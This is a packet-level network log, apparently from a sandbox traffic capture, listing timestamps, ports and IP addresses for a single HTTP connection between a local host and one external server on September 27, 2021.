Sep 27, 2021 18:33:09.142327070 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.142344952 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.142354012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.142385006 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.142421961 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.142776012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.142805099 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.142836094 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.142874002 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.142879009 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.142921925 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.142926931 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.142966986 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.142976046 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.142991066 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143009901 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143013000 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143037081 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143038988 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143064022 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143071890 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143086910 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143102884 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143110991 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143148899 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143151045 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143174887 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143193960 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143197060 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143239021 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143248081 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143265963 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143281937 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143307924 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143337011 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143348932 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143388033 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143393040 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143416882 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143440962 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143445969 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143465042 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143486023 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143487930 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143511057 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143532038 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143558025 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143583059 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143609047 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143630028 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143656969 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143663883 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143702030 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143703938 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143745899 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143757105 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143779993 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143799067 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143802881 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143825054 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143826962 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143851042 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143862963 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143876076 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143898964 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.143903971 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143944979 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.143970013 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144012928 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144028902 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144068956 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144077063 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144108057 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144130945 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144133091 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144153118 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144166946 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144179106 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144203901 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144208908 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144253016 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144285917 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144309998 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144330025 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144332886 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144357920 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144373894 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144382954 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144407988 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144418955 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144431114 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144463062 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144485950 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144503117 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144524097 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144541025 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144568920 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144634962 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144682884 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144695997 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144718885 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144740105 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144742012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144766092 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144768000 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144789934 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.144794941 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144821882 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.144848108 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.148154020 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.148262024 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.148366928 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.148392916 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.148413897 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.148430109 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.148437023 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.148462057 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.148475885 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.148571014 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.148585081 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.149399996 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.149457932 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.149480104 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.149483919 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.149516106 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.149561882 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.149607897 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.149662971 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.149775028 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.149800062 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.149821997 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.149836063 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.149846077 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.149868965 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.149878025 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.149894953 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.149913073 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.149945021 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.149964094 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.149991035 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.150008917 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.150013924 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.150046110 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.150098085 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.151333094 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.151388884 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.151413918 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.151416063 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.151444912 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.151452065 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.151478052 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.151504040 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.151669979 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.151719093 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.151822090 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.151868105 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.152035952 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.152060032 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.152091026 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.152123928 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.152131081 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.152170897 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.152261019 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.152285099 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.152307034 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.152307034 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.152331114 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.152338982 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.152357101 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.152380943 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.152400970 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.152445078 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.152467012 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.152472019 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.152559996 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.152983904 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.153012991 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.153065920 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.153074980 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.153119087 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.153139114 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.153163910 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.153182030 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.153213024 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.153219938 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.153248072 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.153260946 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.153285027 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.153433084 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.153471947 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.153486013 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.153515100 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.153551102 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.153594017 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.153625011 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.153650045 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.153670073 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.153754950 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.159869909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.159898996 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.159915924 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.159933090 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.159959078 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.159984112 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160007000 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160033941 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160058975 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160082102 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160089970 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160104036 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160128117 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160152912 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160176039 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160200119 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160208941 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160228014 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160254002 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160264969 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160276890 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160300970 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160325050 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160329103 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160347939 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160372019 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160381079 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160396099 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160423040 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160425901 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160449028 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160471916 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160481930 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160496950 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160521984 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160531998 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160545111 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160568953 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160579920 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160593033 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160619020 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160633087 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160644054 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160667896 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160676956 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160692930 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160717964 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160739899 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160753965 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160763979 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160787106 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160815001 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160832882 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160847902 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160871983 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160902023 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160911083 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160928965 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160953045 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160957098 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.160986900 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.160996914 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161012888 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161036968 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161060095 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161083937 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161094904 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161109924 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161134005 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161144972 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161163092 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161173105 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161194086 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161217928 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161217928 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161242962 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161266088 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161271095 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161295891 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161307096 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161322117 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161334038 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161356926 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161366940 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161384106 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161406994 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161407948 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161432981 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161442041 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161488056 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161498070 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161516905 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161555052 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161566019 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161580086 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161603928 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161603928 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161627054 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161631107 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161648035 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161659956 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161668062 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161679983 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161710978 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161710978 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161732912 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161753893 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161772966 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161772966 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161788940 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161798954 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161827087 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.161832094 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161853075 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161870956 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.161937952 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.162626982 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.162667990 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.162708044 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.162722111 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.162738085 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.162770033 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.162771940 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.162796021 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.162808895 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.162818909 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.162838936 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.162847042 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.162869930 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.162882090 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.162897110 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.162914991 CEST	49741	80	192.168.2.6	23.88.105.196
Sep 27, 2021 18:33:09.162920952 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.162944078 CEST	80	49741	23.88.105.196	192.168.2.6
Sep 27, 2021 18:33:09.162959099 CEST	49741	80	192.168.2.6	23.88.105.196
